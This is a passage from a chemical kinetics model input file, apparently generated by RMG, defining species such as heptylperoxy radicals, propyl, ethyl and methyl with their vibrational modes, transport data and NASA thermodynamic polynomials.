thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.869629,0.0703718,-3.49835e-05,7.97988e-09,-7.11975e-13,-2437.92,29.442], Tmin=(100,'K'), Tmax=(2507.38,'K')), NASAPolynomial(coeffs=[23.6823,0.0339797,-1.3213e-05,2.19165e-09,-1.34869e-13,-13878.2,-101.587], Tmin=(2507.38,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-21.1865,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(507.183,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJCC)"""),
)
species(
label = 'CCC[CH]O[O](143)',
structure = SMILES('CCC[CH]O[O]'),
E0 = (107.961,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,492.5,1135,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,180,180],'cm^-1')),
HinderedRotor(inertia=(0.120261,'amu*angstrom^2'), symmetry=1, barrier=(2.76503,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120067,'amu*angstrom^2'), symmetry=1, barrier=(2.76059,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.120388,'amu*angstrom^2'), symmetry=1, barrier=(2.76796,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.48129,'amu*angstrom^2'), symmetry=1, barrier=(11.0658,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (88.1051,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.80224,0.0553008,-3.67942e-05,-1.19722e-08,2.59231e-11,13057,21.9545], Tmin=(100,'K'), Tmax=(531.454,'K')), NASAPolynomial(coeffs=[5.7889,0.0367206,-1.66008e-05,3.14924e-09,-2.19362e-13,12471.9,3.72327], Tmin=(531.454,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(107.961,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOOH) + radical(ROOJ)"""),
)
species(
label = 'npropyl(70)',
structure = SMILES('[CH2]CC'),
E0 = (87.0621,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000],'cm^-1')),
HinderedRotor(inertia=(0.0928812,'amu*angstrom^2'), symmetry=1, barrier=(2.13552,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.092914,'amu*angstrom^2'), symmetry=1, barrier=(2.13628,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (43.0877,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2218.31,'J/mol'), sigma=(4.982,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.02816,0.0147023,2.40511e-05,-3.6674e-08,1.38612e-11,10512.1,12.4699], Tmin=(100,'K'), Tmax=(984.463,'K')), NASAPolynomial(coeffs=[6.16542,0.0184495,-6.7903e-06,1.23049e-09,-8.63868e-14,9095.06,-6.676], Tmin=(984.463,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(87.0621,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), label="""npropyl""", comment="""Thermo library: DFT_QCI_thermo"""),
)
species(
label = 'H(3)',
structure = SMILES('[H]'),
E0 = (211.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,25472.7,-0.459566], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,25472.7,-0.459785], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.792,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCC[C](CCC)O[O](144)',
structure = SMILES('CCC[C](CCC)O[O]'),
E0 = (22.2936,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([360,370,350,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,492.5,1135,1000,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.307683,0.102087,-0.000101217,6.59004e-08,-1.9306e-11,2829.86,35.3038], Tmin=(100,'K'), Tmax=(797.655,'K')), NASAPolynomial(coeffs=[7.35057,0.0636835,-2.89977e-05,5.54111e-09,-3.88302e-13,1608.13,0.0884967], Tmin=(797.655,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(22.2936,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(C2CsJOOH)"""),
)
species(
label = 'C2H5(32)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.59,1642.33,1643.48,3621.68,3622.96],'cm^-1')),
HinderedRotor(inertia=(0.866827,'amu*angstrom^2'), symmetry=1, barrier=(19.9301,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = '[CH2]C(CCC)O[O](145)',
structure = SMILES('[CH2]C(CCC)O[O]'),
E0 = (96.9176,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,408.322,408.323],'cm^-1')),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.87169,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665328,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665326,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (102.132,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.761829,0.0732135,-6.43673e-05,3.2225e-08,-6.86802e-12,11771.4,29.3513], Tmin=(100,'K'), Tmax=(1094.49,'K')), NASAPolynomial(coeffs=[10.3082,0.0383245,-1.65516e-05,3.0998e-09,-2.1529e-13,9681.74,-17.5663], Tmin=(1094.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(96.9176,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(CJCOOH)"""),
)
species(
label = 'CC[CH]C(CCC)O[O](146)',
structure = SMILES('CC[CH]C(CCC)O[O]'),
E0 = (35.8095,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.308665,0.100406,-8.84314e-05,4.61229e-08,-1.05358e-11,4457.31,38.0039], Tmin=(100,'K'), Tmax=(1010.26,'K')), NASAPolynomial(coeffs=[10.3052,0.0583815,-2.60341e-05,4.94683e-09,-3.46273e-13,2312.78,-13.3102], Tmin=(1010.26,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(35.8095,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH) + radical(ROOJ)"""),
)
species(
label = '[CH2]CC(CCC)O[O](147)',
structure = SMILES('[CH2]CC(CCC)O[O]'),
E0 = (64.4211,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (116.158,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.305339,0.0849559,-7.17251e-05,3.49657e-08,-7.40173e-12,7878,33.0286], Tmin=(100,'K'), Tmax=(1086.3,'K')), NASAPolynomial(coeffs=[10.2215,0.0484424,-2.13058e-05,4.02302e-09,-2.80588e-13,5723.63,-15.6317], Tmin=(1086.3,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(64.4211,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH3(18)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'C[CH]CC(CCC)O[O](148)',
structure = SMILES('C[CH]CC(CCC)O[O]'),
E0 = (29.8408,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.222128,0.099523,-9.48843e-05,5.89934e-08,-1.65158e-11,3735.18,38.13], Tmin=(100,'K'), Tmax=(831.502,'K')), NASAPolynomial(coeffs=[7.49589,0.0623944,-2.79046e-05,5.29089e-09,-3.69296e-13,2451.69,2.31923], Tmin=(831.502,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(29.8408,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)O[O](149)',
structure = SMILES('[CH2]CCC(CCC)O[O]'),
E0 = (40.6409,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.31089,0.0993682,-8.4228e-05,4.1255e-08,-8.78157e-12,5039.37,37.4872], Tmin=(100,'K'), Tmax=(1080.2,'K')), NASAPolynomial(coeffs=[11.1942,0.0567646,-2.5067e-05,4.74259e-09,-3.31152e-13,2553.82,-18.9057], Tmin=(1080.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(40.6409,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH2(S)(24)',
structure = SMILES('[CH2]'),
E0 = (418.921,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1358.21,2621.43,3089.55],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19331,-0.00233105,8.15676e-06,-6.62986e-09,1.93233e-12,50366.2,-0.746734], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.13502,0.00289594,-8.16668e-07,1.13573e-10,-6.36263e-15,50504.1,4.06031], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(418.921,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'CCCC(CC)O[O](150)',
structure = SMILES('CCCC(CC)O[O]'),
E0 = (-140.825,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (117.166,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.21933,0.0849261,-6.42064e-05,2.69561e-08,-4.88243e-12,-16803,31.5405], Tmin=(100,'K'), Tmax=(1248.35,'K')), NASAPolynomial(coeffs=[11.4159,0.0490497,-2.10977e-05,3.93422e-09,-2.71954e-13,-19598.4,-24.9599], Tmin=(1248.35,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-140.825,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(482.239,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'CCC[C](CCC)OO(139)',
structure = SMILES('CCC[C](CCC)OO'),
E0 = (-129.711,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.331826,0.102878,-8.67857e-05,4.38793e-08,-9.97788e-12,-15451,34.63], Tmin=(100,'K'), Tmax=(996.253,'K')), NASAPolynomial(coeffs=[9.10012,0.0650087,-2.97678e-05,5.72457e-09,-4.0335e-13,-17330.4,-10.8383], Tmin=(996.253,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-129.711,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(C2CsJOOH)"""),
)
species(
label = 'CC[CH]C(CCC)OO(140)',
structure = SMILES('CC[CH]C(CCC)OO'),
E0 = (-116.195,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
